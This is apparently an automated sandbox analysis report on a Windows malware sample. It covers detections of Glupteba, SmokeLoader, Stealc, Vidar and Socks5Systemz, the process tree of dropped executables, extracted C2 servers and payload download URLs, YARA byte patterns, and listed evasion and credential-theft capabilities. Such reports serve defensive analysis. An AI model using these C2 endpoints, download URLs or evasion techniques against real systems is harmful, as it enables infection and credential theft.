
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1407288
MD5: 699e79d0f4a7586ffe53d0dabc5c0a5a
SHA1: 7178ab85fe6190259b64846c76af01b8da5b0cd4
SHA256: b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca
Tags: exe

Detection

Glupteba, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Glupteba
Yara detected Mars stealer
Yara detected SmokeLoader
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to infect the boot sector
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Drops script or batch files to the startup folder
Found API chain indicative of debugger detection
Found Tor onion address
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different from the original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 1892 cmdline: C:\Users\user\Desktop\file.exe MD5: 699E79D0F4A7586FFE53D0DABC5C0A5A)
    • CasPol.exe (PID: 44120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • InstallUtil.exe (PID: 44140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • JgqIdYSSt70LQLRUqfTzKJw8.exe (PID: 4148 cmdline: "C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
        • JgqIdYSSt70LQLRUqfTzKJw8.tmp (PID: 3692 cmdline: "C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe" MD5: F1EEAE7DAB5E51B2A76DB6651423C9F5)
          • simplewebbuilder.exe (PID: 45032 cmdline: "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i MD5: 7BFD8C9EBE20C4BF0BED7F74A74E8646)
          • simplewebbuilder.exe (PID: 6628 cmdline: "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s MD5: 7BFD8C9EBE20C4BF0BED7F74A74E8646)
      • 3cs4PKncIzTPVTZHP3GDsO8B.exe (PID: 45672 cmdline: "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe" MD5: 0D69DD3893505245669619A06840C2FE)
        • syncUpd.exe (PID: 45728 cmdline: C:\Users\user\AppData\Local\Temp\syncUpd.exe MD5: 220CB1B1688C2364B9AB272E37B896F3)
        • BroomSetup.exe (PID: 46056 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: EEE5DDCFFBED16222CAC0A1B4E2E466E)
          • cmd.exe (PID: 44496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • 7odVnHyI6UBWlRBALo6WuNSW.exe (PID: 45880 cmdline: "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0 MD5: 918151F14C10B6BB7533F6D97BF22D2D)
        • 7odVnHyI6UBWlRBALo6WuNSW.exe (PID: 45904 cmdline: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0 MD5: 918151F14C10B6BB7533F6D97BF22D2D)
        • 7odVnHyI6UBWlRBALo6WuNSW.exe (PID: 44560 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version MD5: 918151F14C10B6BB7533F6D97BF22D2D)
      • Ca4kQMpVXP8DY5HQ8cbuvFmH.exe (PID: 45928 cmdline: "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • 1V9g5oUcP4AKlGIaRK4CDHUH.exe (PID: 45968 cmdline: "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • 93gthV73eSBvEuNxXjo0G1yI.exe (PID: 45116 cmdline: "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • FNi4gQqkHn29EqnTv0rxfxe1.exe (PID: 4788 cmdline: "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
        • FNi4gQqkHn29EqnTv0rxfxe1.tmp (PID: 44372 cmdline: "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe" MD5: F1EEAE7DAB5E51B2A76DB6651423C9F5)
      • HjvCaWONZRgrucQ7NCpBwfHi.exe (PID: 4724 cmdline: "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • xzRRQmj1LpBxF1iTy72H1YWe.exe (PID: 4480 cmdline: "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0 MD5: BCC38593B03EE04D072E36C9513BCF54)
      • eofj7Pf9I3ORdN1nDBhGJIZl.exe (PID: 2860 cmdline: "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • jUzz7ezNBFbkGCxJO9DOH9dj.exe (PID: 5024 cmdline: "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
      • NuRMT0uazLQnmOJibnohOTUR.exe (PID: 6424 cmdline: "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • N82pZRBoHBOB1dfNMGUFcUyF.exe (PID: 45596 cmdline: "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • XgAVLWIvGKK9IeCrDuWuJavo.exe (PID: 45608 cmdline: "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0 MD5: 442BA51AC0AF3E8D9F489F643AFA6268)
      • Rk1pfEVtKjXZKi5E0UJ5igqM.exe (PID: 45528 cmdline: "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • qvx2vm8LJ8TphvujtDcRyl5q.exe (PID: 44292 cmdline: "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
      • 2A8JXH5ilBvpWPJYIqcYohVL.exe (PID: 44364 cmdline: "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • bizN5UTpdWpltkCaYrvmwbQI.exe (PID: 44640 cmdline: "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0 MD5: 45D3B5DA2599B55F638873CE9E5AF959)
      • PvJ9KZy5kaC0ZzTLP46Ng6g6.exe (PID: 44656 cmdline: "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
      • FnEWeb8TPMfAXv33KZpKVFTq.exe (PID: 44676 cmdline: "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • h9Cux8w1auuBknjQZWKFquuD.exe (PID: 44788 cmdline: "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
    • InstallUtil.exe (PID: 44148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • WerFault.exe (PID: 44248 cmdline: C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6576 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 44172 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 44224 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cmd.exe (PID: 45008 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 45016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 44776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 45392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 45400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
{"C2 list": ["ddtwcxy.info"]}
{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
{"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-L72V0.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | -
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | -

Source | Rule | Description | Author | Strings
0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | see below
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | see below
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | -
00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | see below
  • 0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | see below
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
(35 entries in total; not all shown)

Source | Rule | Description | Author | Strings
22.2.syncUpd.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | -
22.2.syncUpd.exe.400000.0.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security | -
22.3.syncUpd.exe.8f0000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | -
22.3.syncUpd.exe.8f0000.0.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security | -
22.2.syncUpd.exe.8c0e67.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | -
(13 entries in total; not all shown)

System Summary

Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6576, ProcessName: svchost.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 44140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat
No Snort rule has matched

AV Detection

Source: file.exe; Avira: detected
Source: http://galandskiyher5.com/downloads/toolspub1.exe; Avira URL Cloud: Label: malware
Source: http://185.172.128.90/cpa/ping.php?substr=seven&s=ab; Avira URL Cloud: Label: malware
Source: http://galandskiyher5.com/downloads/toolspub1.exe4kL; Avira URL Cloud: Label: malware
Source: http://15.204.49.148; Avira URL Cloud: Label: malware
Source: https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=; Avira URL Cloud: Label: malware
Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe; Avira: detection malicious, Label: HEUR/AGEN.1315065
Source: C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe; Avira: detection malicious, Label: HEUR/AGEN.1316657
Source: C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe; Avira: detection malicious, Label: HEUR/AGEN.1316657
Source: C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe; Avira: detection malicious, Label: HEUR/AGEN.1316657
Source: C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe; Avira: detection malicious, Label: HEUR/AGEN.1316657
Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Source: simplewebbuilder.exe.6628.17.memstrmin; Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ddtwcxy.info"]}
Source: http://185.172.128.145/15f649199f40275b/freebl3.dll; Virustotal: Detection: 15%
Source: http://trade-inmyus.com/index.php; Virustotal: Detection: 15%
Source: http://185.172.128.145/15f649199f40275b/mozglue.dll; Virustotal: Detection: 15%
Source: http://galandskiyher5.com/downloads/toolspub1.exe; Virustotal: Detection: 19%
Source: http://185.172.128.145/3cd2b41cbde8fc9c.php; Virustotal: Detection: 18%
Source: http://185.172.128.90/cpa/ping.php?substr=seven&s=ab; Virustotal: Detection: 21%
Source: http://185.172.128.187/; Virustotal: Detection: 15%
Source: http://15.204.49.148; Virustotal: Detection: 18%
Source: http://185.172.128.187/ping.php?substr=seven; Virustotal: Detection: 17%
Source: http://185.172.128.145/15f649199f40275b/sqlite3.dll; Virustotal: Detection: 17%
Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe; ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe; ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe; ReversingLabs: Detection: 75%
Source: file.exe; Virustotal: Detection: 34%
Source: Yara match; File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exe; Joe Sandbox ML: detected
Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe; Joe Sandbox ML: detected
Source: file.exe; Joe Sandbox ML: detected
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: CtIvEWInDoW
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: AgEBOxw
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: ijklmnopqrs
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: /#%33@@@
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: abcdefghijklmnopqrs
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: @@@@<@@@
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: abcdefghijklmnopqrs
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: %s\%V/yVs
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: %s\*.
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: }567y9n/S
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: ntTekeny
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: ging
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: PassMord0
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: J@@@`z`@J@@@J@@@
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: OPQRSTUVWXY
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: 456753+/---- '
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: '--- '
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: qRslaZ9Iw|
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: HeapFree
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: GetLocaleInfoA
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: ntProcessId
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: wininet.dll
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: shlwapi.dll
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: shell32.dll
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: .dll
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: column_text
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: }67b)>4`,LXZu2L6qd
Source: 22.2.syncUpd.exe.400000.0.raw.unpack; String decryptor: login:
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp; Code function: 15_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,15_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp; Code function: 15_2_0045D254 ArcFourCrypt,15_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp; Code function: 15_2_0045D23C ArcFourCrypt,15_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp; Code function: 15_2_10001000 ISCryptGetVersion,15_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp; Code function: 15_2_10001130 ArcFourCrypt,15_2_10001130

Bitcoin Miner

Source: Yara match; File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR

Compliance

Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe; Unpacked PE file: 16.2.simplewebbuilder.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe; Unpacked PE file: 22.2.syncUpd.exe.400000.0.unpack
Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe; Unpacked PE file: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack
Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe; File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085307048.log
Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe; File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085338724.log
Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe; File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085318383.log
Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe; File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085332766.log
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
